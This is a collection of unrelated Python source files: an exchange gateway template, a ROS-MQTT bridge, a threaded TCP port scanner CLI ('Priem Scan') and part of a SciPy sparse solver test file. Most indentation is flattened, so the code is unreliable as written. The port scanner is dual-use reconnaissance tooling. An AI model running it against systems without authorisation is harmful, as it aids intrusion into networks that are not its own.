bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if type(bids[i][0]) != float else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if type(bids[i][1]) != float else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if type(asks[i][0]) != float else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if type(asks[i][1]) != float else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
for t in res:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwTemplate(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_storages):
"""
Constructor
        :param db_storages: List of database storages
"""
        ExchangeGateway.__init__(self, RESTfulApiTemplate(), db_storages)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Template'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
        Get trades worker
        :param instmt: Instrument
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
                time.sleep(1)
                continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Process(target=partial(self.get_order_book_worker, instmt))
t2 = Process(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
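# A minimal sketch of driving the gateway through ``start`` instead of calling
# the worker loops directly (as the __main__ block below does).  ``run_gateway``
# is illustrative only; it simply joins the two worker processes returned by
# ``start``.
def run_gateway(instmt, db_storages):
    """Start both workers for one instrument and block until they exit."""
    gateway = ExchGwTemplate(db_storages)
    workers = gateway.start(instmt)
    for worker in workers:
        worker.join()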
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Template'
instmt_name = 'BTCCNY'
instmt_code = 'btccny'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_storage = SqlStorageTemplate()
exch = ExchGwTemplate([db_storage])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
bridge.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
import inject
import paho.mqtt.client as mqtt
import rospy
from .util import lookup_object, extract_values, populate_instance
from threading import Condition
from queue import Queue
from uuid import uuid4
from threading import Thread
def create_bridge(factory, **kwargs):
u""" bridge generator function
:param (str|class) factory: Bridge class
:param kwargs: bridge-specific arguments
:return Bridge: bridge object
"""
    if isinstance(factory, str):
factory = lookup_object(factory)
if not issubclass(factory, Bridge):
raise ValueError("factory should be Bridge subclass")
return factory(**kwargs)
class Bridge(object):
u""" Bridge base class
:param mqtt.Client _mqtt_client: MQTT client
:param _serialize: message serialize callable
:param _deserialize: message deserialize callable
"""
__metaclass__ = ABCMeta
_mqtt_client = inject.attr(mqtt.Client)
_serialize = inject.attr('serializer')
_deserialize = inject.attr('deserializer')
_extract_private_path = inject.attr('mqtt_private_path_extractor')
class DynamicBridgeServer(Bridge):
u""" Dynamic Bridge Server that serves as the remote end to PublishBridge
and SubscribeBridge, as well as the RemoteService. Should always be instantiated if
indeed the purpose is bridging between ROS-sides.
"""
def __init__(self, control_topic="__dynamic_server"):
self._control_topic = control_topic + '/topic/#'
self._service_topic = control_topic + '/service/request/#'
self._register_service_topic = control_topic + '/service/register/#'
self._mqtt_client.subscribe(self._control_topic, qos=2)
self._mqtt_client.message_callback_add(self._control_topic, self._callback_mqtt_topic)
self._mqtt_client.subscribe(self._service_topic, qos=2)
self._mqtt_client.message_callback_add(self._service_topic, self._callback_mqtt_service)
self._mqtt_client.subscribe(self._register_service_topic, qos=2)
self._mqtt_client.message_callback_add(self._register_service_topic, self._register_service)
self._bridges = set([])
rospy.loginfo('DynamicBridgeServer started on control topic %s' % control_topic)
def _callback_mqtt_service(self, client, userdata, mqtt_msg):
t = Thread(target=self.__callback_mqtt_service, args=(userdata, mqtt_msg))
t.start()
def __callback_mqtt_service(self, userdata, mqtt_msg):
rospy.logdebug("MQTT service call received from {}".format(mqtt_msg.topic))
msg_dict = self._deserialize(mqtt_msg.payload)
service_type = lookup_object(msg_dict['type'])
request_type = lookup_object(msg_dict['type'] + 'Request')
# create request object
request = request_type()
# and populate it
populate_instance(msg_dict['args'], request)
response_type = lookup_object(msg_dict['type'] + 'Response')
# create empty response object
response = response_type()
msg_dict['op'] = 'response'
try:
rospy.logdebug('waiting for service %s' % msg_dict['service'])
rospy.wait_for_service(msg_dict['service'], 1)
service = rospy.ServiceProxy(msg_dict['service'], service_type)
response = service.call(request)
msg_dict['response'] = extract_values(response)
except Exception:
rospy.logerr("Service %s doesn't exist" % msg_dict['service'])
msg_dict['response'] = None
finally:
payload = bytearray(self._serialize(msg_dict))
self._mqtt_client.publish(
topic=msg_dict['response_topic'], payload=payload,
qos=2, retain=False)
def _register_service(self, client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
if msg_dict['op'] == 'register':
rospy.loginfo("register service proxy")
self._bridges.add(RemoteService(
**msg_dict['args'])
)
def _callback_mqtt_topic(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
def __bridge_exists(args):
for __bridge in self._bridges:
if __bridge._topic_from == args['topic_to'] and\
__bridge._topic_to == args['topic_from']:
return True
return False
if msg_dict['op'] == 'mqtt2ros_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward mqtt topic to ros %s" % (
msg_dict['args']))
self._bridges.add(MqttToRosBridge(
**msg_dict['args'])
)
else:
rospy.loginfo("bridge for %s already initialised" % (
msg_dict['args']))
if msg_dict['op'] == 'ros2mqtt_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward ros topic to mqtt %s" % (
msg_dict['args']))
self._bridges.add(RosToMqttBridge(
**msg_dict['args'])
)
else:
rospy.logwarn("bridge for %s already initialised" % (
msg_dict['args']))
class RosToMqttBridge(Bridge):
u""" Bridge from ROS topic to MQTT
:param str topic_from: incoming ROS topic path
:param str topic_to: outgoing MQTT topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param bool latched: retain the last message on the MQTT topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None, latched=False, qos=0):
self._topic_from = topic_from
self._topic_to = self._extract_private_path(topic_to)
self._last_published = rospy.get_time()
self._interval = 0 if frequency is None else 1.0 / frequency
self._latched = latched
self._qos = qos
        if isinstance(msg_type, str):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
raise TypeError(
"msg_type should be rospy.Message instance or its string"
"reprensentation")
rospy.Subscriber(topic_from, msg_type, self._callback_ros)
def _callback_ros(self, msg):
rospy.logdebug("ROS received from {}".format(self._topic_from))
now = rospy.get_time()
if now - self._last_published >= self._interval:
self._publish(msg)
self._last_published = now
def _publish(self, msg):
payload = bytearray(self._serialize(extract_values(msg)))
self._mqtt_client.publish(
topic=self._topic_to, payload=payload,
qos=self._qos, retain=self._latched)
class MqttToRosBridge(Bridge):
u""" Bridge from MQTT to ROS topic
:param str topic_from: incoming MQTT topic path
:param str topic_to: outgoing ROS topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param int queue_size: ROS publisher's queue size (default: 10)
    :param bool latched: latch the ROS topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None,
queue_size=10, latched=False, qos=0):
self._topic_from = self._extract_private_path(topic_from)
self._topic_to = topic_to
        if isinstance(msg_type, str):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
raise TypeError(
"msg_type should be rospy.Message instance or its string"
"reprensentation")
self._msg_type = msg_type
self._queue_size = queue_size
self._latched = latched
self._qos = qos
self._last_published = rospy.get_time()
self._interval = None if frequency is None else 1.0 / frequency
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(self._topic_from, qos=self._qos)
self._mqtt_client.message_callback_add(self._topic_from, self._callback_mqtt)
self._publisher = rospy.Publisher(
self._topic_to, self._msg_type, queue_size=self._queue_size, latch=self._latched)
def _callback_mqtt(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
rospy.logdebug("MQTT received from {}".format(mqtt_msg.topic))
now = rospy.get_time()
if self._interval is None or now - self._last_published >= self._interval:
try:
ros_msg = self._create_ros_message(mqtt_msg)
self._publisher.publish(ros_msg)
self._last_published = now
except Exception as e:
rospy.logerr(e)
def _create_ros_message(self, mqtt_msg):
u""" create ROS message from MQTT payload
:param mqtt.Message mqtt_msg: MQTT Message
:return rospy.Message: ROS Message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
return populate_instance(msg_dict, self._msg_type())
class SubscribeBridge(MqttToRosBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_from.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
        super(SubscribeBridge, self).__init__(self._mqtt_topic, topic_to, msg_type, frequency=frequency, latched=latched, qos=qos)
rospy.loginfo('SubscribeBridge: subscribe ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'ros2mqtt_subscribe',
'args': {
'topic_from': topic_from,
'topic_to': self._mqtt_topic,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=False)
class PublishBridge(RosToMqttBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_to.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(PublishBridge, self).__init__(topic_from, self._mqtt_topic, msg_type, frequency, latched, qos)
rospy.loginfo('PublishBridge: publish from ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'mqtt2ros_subscribe',
'args': {
'topic_from': self._mqtt_topic,
'topic_to': topic_to,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=False)
class LocalServiceProxy(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._register_service_topic = control_topic + '/service/register/' + (local_server + "_TO_" + remote_server).replace('/','_')
rospy.loginfo('LocalServiceProxy: offer remote access to ROS service %s as %s via MQTT' %
(local_server, remote_server)
)
cmd = {
'op': 'register',
'args': {
'local_server': remote_server,
'remote_server': local_server,
'srv_type': srv_type,
'control_topic': control_topic
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._register_service_topic, payload=payload,
qos=2, retain=False)
class RemoteService(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._local_server = local_server
self._remote_server = remote_server
self._control_topic = control_topic
self._mqtt_topic_request = self._control_topic + '/service/request/' + (local_server + "_TO_" + remote_server).replace('/','_')
self._srv_type_name = srv_type
self._srv_type = lookup_object(self._srv_type_name)
try:
self._serviceproxy = rospy.Service(self._local_server, self._srv_type, self._ros_handler)
except Exception as e:
rospy.logwarn(e)
def _ros_handler(self, req):
responses = {}
lock = Condition()
def __response_handler(client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
rospy.logdebug('got response for %s' % msg_dict['id'])
with lock:
responses[msg_dict['id']] = msg_dict['response']
                lock.notify_all()
rospy.logdebug('local service %s called.' % self._local_server)
# generate a unique ID
request_id = str(uuid4())
# build a request to send to the external client
request_message = {
"op": "call_service",
"id": request_id,
"response_topic": self._control_topic + '/service/response/' + request_id,
"type": self._srv_type_name,
"service": self._remote_server,
"args": extract_values(req)
}
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(request_message['response_topic'], qos=2)
self._mqtt_client.message_callback_add(request_message['response_topic'], __response_handler)
payload = bytearray(self._serialize(request_message))
self._mqtt_client.publish(
topic=self._mqtt_topic_request, payload=payload,
qos=2, retain=False)
# wait for a response
while not rospy.is_shutdown() and request_id not in responses.keys():
with lock:
lock.wait(1) # check for shutdown every 1 second
resp = responses[request_id]
del responses[request_id]
self._mqtt_client.unsubscribe(request_message['response_topic'])
# assemble response object
response_type = lookup_object(self._srv_type_name+"Response")
# create response object
r = response_type()
# and populate it
if resp is None:
rospy.logerr('Service Request could not be completed')
raise rospy.ROSException('Service Request could not be completed')
populate_instance(resp, r)
return r
__all__ = [
'create_bridge', 'Bridge', 'RosToMqttBridge', 'MqttToRosBridge',
'DynamicBridgeServer', 'SubscribeBridge', 'PublishBridge', 'RemoteService', 'LocalServiceProxy']
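# A minimal sketch of wiring a bridge pair by hand, purely illustrative: it
# assumes a rospy node is up and that the inject bindings for the MQTT client,
# (de)serializers and private-path extractor have already been configured, as
# the bridge node's setup normally does.  The topic names are placeholders and
# the 'std_msgs.msg:Bool' string assumes lookup_object resolves
# 'module:attribute' paths.
def _example_setup():
    return [
        create_bridge(RosToMqttBridge,
                      topic_from='/ping', topic_to='ping',
                      msg_type='std_msgs.msg:Bool'),
        create_bridge(MqttToRosBridge,
                      topic_from='pong', topic_to='/pong',
                      msg_type='std_msgs.msg:Bool'),
    ]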
|
pscan.py
|
from argparse import ArgumentParser
from math import ceil, log
from re import match
from random import shuffle
from shutil import get_terminal_size
from socket import socket
from socket import AF_INET, SOCK_STREAM
from socket import error
from sys import argv, exit
from threading import Thread
from time import sleep, time
from typing import List, Optional
from datetime import timedelta
__author__ = "Jaymund Cyrus Floranza (CryptoNyxz)"
__version__ = (0, 1, 1)
__license__ = """
MIT License
Copyright (c) 2021 Jaymund Cyrus F. Floranza
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# Utility Functions
def keyboard_interrupt() -> None:
"""
KeyboardInterrupt kill switch.
Runs when KeyboardInterrupt is triggered.
"""
print('\r\nAborted by user.\n', end='')
exit(-1)
# Classes
class ProgressBar:
"""
For displaying progress bars.
:param max_value: The upper limit of the progress bar.
"""
@staticmethod
def rescale(num: int or float, precision: Optional[int] = 1) -> str:
"""
Rescale the number by 10^3 to make it easier to read.
:param num: The number to be rescaled.
        :param precision: The number of decimal places to keep in the rescaled value.
:return: The string representation of the rescaled number.
"""
scale = ['', 'K', 'M', 'B', 'T']
index = int(log(num, 1000)) if num and num != float("inf") else 0
        rounded = round(num / pow(1000, index), precision)
return f"{rounded}{scale[index]}"
def __init__(self, max_value: int or float):
self.max_value = max_value
self.current_val = 0
self.rate = None
self.start_time = None
self.start_value = None
self.stopped = True
@property
def done(self) -> bool:
"""
Return if already finished.
:return: The boolean value.
"""
return self.current_val >= self.max_value or self.stopped
def start(self):
"""Start the progress bar."""
self.stopped = False
self.start_time = time()
self.start_value = self.current_val
def stop(self):
"""Stop the progress bar."""
self.stopped = True
def add_progress(self, value: int or float):
"""
Count new progress.
:param value: Added progress value.
"""
if self.stopped:
return
self.current_val += value
def display(self):
"""Display the current progress."""
if self.stopped:
return
d_value = self.current_val - self.start_value
d_max_value = self.max_value - self.start_value
d_time = time() - self.start_time
length = int(0.35 * get_terminal_size().columns)
per = d_value/d_max_value
prog = int(length*per)
extra = length*round(per) > prog
prog_bar = '█'*prog + '▌'*extra
spaces = ' '*(length - (prog + extra))
rate = d_value/d_time if d_time else float('inf')
eta_s = round((d_max_value - d_value)/rate) if rate else \
None
eta = timedelta(seconds=eta_s) if eta_s is not None else '?'
clear_line = " "*(get_terminal_size().columns - 1)
print(f"{clear_line}\r"
"Progress: "
f"|{prog_bar}{spaces}| "
f"{100*per:.1f}% "
f"({ProgressBar.rescale(d_value)}) "
f"[{ProgressBar.rescale(rate)}/s] "
f"ETA: {eta}", end="\r")
def cont_display(self):
"""Continuously display progress bar using a separate Thread."""
def inner():
while not self.done and not self.stopped:
self.display()
sleep(5e-3)
self.display()
Thread(target=inner, daemon=False).start()
class PortScanner:
"""
The port scanner class.
:param randomized: If the port scan order should be randomized.
:param delay: The amount of delay in seconds between each port scan.
"""
@staticmethod
def pprint_port(host: str, ports: List[int],
duration: float or int) -> None:
"""
Display TCP ports in a more readable form.
:param host: The target host's address, IP address or domain name.
:param ports: The TCP ports to be displayed.
:param duration: The total duration of the scan.
"""
table_width = (get_terminal_size().columns // 7) - 2
table_height = ceil(len(ports) / table_width)
table_top = (
7 * ' '
+ '┌'
+ '─'*(table_width * 7)
+ '┐\r\n'
)
        row_sep = '\r\n' + 7*' ' + '├' + '─'*(table_width * 7) + '┤\r\n'
table_bottom = (
'\r\n'
+ 7 * ' '
+ '└'
+ '─' * (table_width * 7)
+ '┘'
)
rows = [
7 * ' '
+ '│'
+ f"Open TCP Ports at {host} ({len(ports)})".center(7*table_width)
+ '│\r\n'
+ 7 * ' '
+ '│'
+ f"Scan took: {timedelta(seconds=duration)}".center(7*table_width)
+ '│'
]
rows += [
7 * ' '
+ '│'
+ ''.join([
str(port).center(7)
for port in ports[r*table_width: (r + 1)*table_width]
])
+ 7*' ' * (
table_width
- len(ports[r*table_width: (r + 1)*table_width])
)
+ '│'
for r in range(table_height)
]
print(table_top + row_sep.join(rows) + table_bottom)
def __init__(self, randomized: Optional[bool] = False,
delay: Optional[int or float] = 0):
self.randomized = randomized
self.delay = delay
# Last scan results
self.open_ports = []
self.scan_duration = 0
self.progress_bar = None
    def check_open(self, host: str, port: int) -> None:
"""
Check if the host:port pair is open to TCP Connections.
:param host: The target host's address, IP address or domain name.
:param port: The target port to be checked.
        :return: None; an open port is appended to self.open_ports.
"""
try:
with socket(AF_INET, SOCK_STREAM) as sock:
sock.connect((host, port))
self.open_ports.append(port)
except error:
pass
except KeyboardInterrupt:
if isinstance(self.progress_bar, ProgressBar):
self.progress_bar.stop()
keyboard_interrupt()
finally:
if isinstance(self.progress_bar, ProgressBar):
self.progress_bar.add_progress(1)
def scan(self, host: str,
port_range: Optional[range] = range(1, 65536)) -> List[int]:
"""
Scan for open ports.
:param host: The target host's address, IP address or domain name.
:param port_range: The range of ports to scan.
:return: The list of open TCP ports.
"""
if not (port_range and
port_range.start >= 1 and port_range.stop <= 65536):
raise ValueError("Port number must be within range (1, 65536)")
time_init = time()
# Reset previous scan results
self.open_ports = []
# Initialize threads
threads = []
for i in range(len(port_range)):
threads.append(Thread(
target=self.check_open,
args=(host, port_range[i]),
daemon=False
))
# Shuffle thread order if randomized scan option is set
if self.randomized:
shuffle(threads)
# Display progress bar
self.progress_bar = ProgressBar(len(port_range))
self.progress_bar.start()
self.progress_bar.cont_display()
# Set up KeyboardInterrupt kill switch
try:
# Start the scan
for thread in threads:
thread.start()
sleep(self.delay)
# Wait while still scanning
while not self.progress_bar.done:
                sleep(5e-3)  # avoid a busy-wait while the worker threads run
except KeyboardInterrupt:
self.progress_bar.stop()
keyboard_interrupt()
else:
# A little cooldown to make sure progress bar finishes
# before displaying results
sleep(5e-2)
# Determine Scan Duration
self.scan_duration = time() - time_init
# Sort the results because it might not be in order due to
# the nature of multithreaded programs, or maybe the scan order
# was randomized
self.open_ports.sort()
return self.open_ports
# Shortened Functions
def port_scan(host: str, randomized: Optional[bool] = False,
delay: Optional[float or int] = 0,
port_range: Optional[range] = range(1, 65536),
pretty_print: Optional[bool] = False) -> List[int] or None:
"""
Scan target host for open TCP ports.
:param host: The target host's address, IP address or domain name.
:param randomized: If the port scan order should be randomized.
:param delay: The amount of delay in seconds between each port scan.
:param port_range: The range of ports to scan.
:param pretty_print: If the results should be pretty-printed instead of
returning the list of open ports.
:return: If pretty-printed, return None, if not, return the list of
open ports
"""
ps = None
try:
ps = PortScanner(randomized, delay)
open_ports = ps.scan(host, port_range)
if pretty_print:
PortScanner.pprint_port(host, open_ports, ps.scan_duration)
else:
return open_ports
except KeyboardInterrupt:
if isinstance(ps, PortScanner):
if isinstance(ps.progress_bar, ProgressBar):
ps.progress_bar.stop()
keyboard_interrupt()
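# A minimal sketch of calling the scanner from other code instead of the CLI
# below; the host and port range are placeholders.
def _example_scan() -> List[int]:
    """Illustrative programmatic use of port_scan."""
    return port_scan("127.0.0.1", delay=0.001, port_range=range(1, 1025))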
if __name__ == "__main__":
parser = ArgumentParser(
prog="Priem Scan",
epilog="Scan for open TCP ports.\nMade by CryptoNyxz"
)
parser.add_argument('-r', '--random',
action='store_true',
help="Randomize the port scan order.")
parser.add_argument('-d', '--delay',
required=False,
type=float,
default=0,
help="The delay between each port scan.")
parser.add_argument('-P', '--portrange',
required=False,
type=str,
help="Port range, for example:\n"
"For ports 24 to 1024:\n"
"-p 24-1024")
parser.add_argument('-H', '--host',
required=True,
type=str,
help="The target host's address, "
"IP address or domain name")
if len(argv) > 1:
args = parser.parse_args()
if isinstance(args.portrange, str):
            if not match(r'^\d+-\d+$', args.portrange):
print("Port range argument must follow the format: a-b")
exit(-2)
            start, stop = map(int, args.portrange.split('-'))
            # +1 so the upper bound given on the command line is scanned too
            args.portrange = range(start, stop + 1)
if not (args.portrange
and args.portrange.start >= 1
and args.portrange.stop <= 65536):
print("Port number must be within range (1, 65536)")
exit(-3)
else:
args.portrange = range(1, 65536)
port_scan(args.host, args.random, args.delay, args.portrange, True)
else:
parser.print_help()
|
test_linsolve.py
|
import sys
import threading
import numpy as np
from numpy import array, finfo, arange, eye, all, unique, ones, dot
import numpy.random as random
from numpy.testing import (
assert_array_almost_equal, assert_almost_equal,
assert_equal, assert_array_equal, assert_, assert_allclose,
assert_warns, suppress_warnings)
import pytest
from pytest import raises as assert_raises
import scipy.linalg
from scipy.linalg import norm, inv
from scipy.sparse import (spdiags, SparseEfficiencyWarning, csc_matrix,
csr_matrix, identity, isspmatrix, dok_matrix, lil_matrix, bsr_matrix)
from scipy.sparse.linalg import SuperLU
from scipy.sparse.linalg.dsolve import (spsolve, use_solver, splu, spilu,
MatrixRankWarning, _superlu, spsolve_triangular, factorized)
import scipy.sparse
from scipy._lib._testutils import check_free_memory
sup_sparse_efficiency = suppress_warnings()
sup_sparse_efficiency.filter(SparseEfficiencyWarning)
# scikits.umfpack is not a SciPy dependency but it is optionally used in
# dsolve, so check whether it's available
try:
import scikits.umfpack as umfpack
has_umfpack = True
except ImportError:
has_umfpack = False
def toarray(a):
if isspmatrix(a):
return a.toarray()
else:
return a
def setup_bug_8278():
N = 2 ** 6
h = 1/N
Ah1D = scipy.sparse.diags([-1, 2, -1], [-1, 0, 1],
shape=(N-1, N-1))/(h**2)
eyeN = scipy.sparse.eye(N - 1)
A = (scipy.sparse.kron(eyeN, scipy.sparse.kron(eyeN, Ah1D))
+ scipy.sparse.kron(eyeN, scipy.sparse.kron(Ah1D, eyeN))
+ scipy.sparse.kron(Ah1D, scipy.sparse.kron(eyeN, eyeN)))
b = np.random.rand((N-1)**3)
return A, b
class TestFactorized(object):
def setup_method(self):
n = 5
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n).tocsc()
random.seed(1234)
def _check_singular(self):
A = csc_matrix((5,5), dtype='d')
b = ones(5)
assert_array_almost_equal(0. * b, factorized(A)(b))
def _check_non_singular(self):
# Make a diagonal dominant, to make sure it is not singular
n = 5
a = csc_matrix(random.rand(n, n))
b = ones(n)
expected = splu(a).solve(b)
assert_array_almost_equal(factorized(a)(b), expected)
def test_singular_without_umfpack(self):
use_solver(useUmfpack=False)
with assert_raises(RuntimeError, match="Factor is exactly singular"):
self._check_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_singular_with_umfpack(self):
use_solver(useUmfpack=True)
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "divide by zero encountered in double_scalars")
assert_warns(umfpack.UmfpackWarning, self._check_singular)
def test_non_singular_without_umfpack(self):
use_solver(useUmfpack=False)
self._check_non_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_non_singular_with_umfpack(self):
use_solver(useUmfpack=True)
self._check_non_singular()
def test_cannot_factorize_nonsquare_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
msg = "can only factor square matrices"
with assert_raises(ValueError, match=msg):
factorized(self.A[:, :4])
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_factorizes_nonsquare_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
# does not raise
factorized(self.A[:,:4])
def test_call_with_incorrectly_sized_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
with assert_raises(ValueError, match="is of incompatible size"):
solve(b)
with assert_raises(ValueError, match="is of incompatible size"):
solve(B)
with assert_raises(ValueError,
match="object too deep for desired array"):
solve(BB)
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_incorrectly_sized_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
# does not raise
solve(b)
msg = "object too deep for desired array"
with assert_raises(ValueError, match=msg):
solve(B)
with assert_raises(ValueError, match=msg):
solve(BB)
def test_call_with_cast_to_complex_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
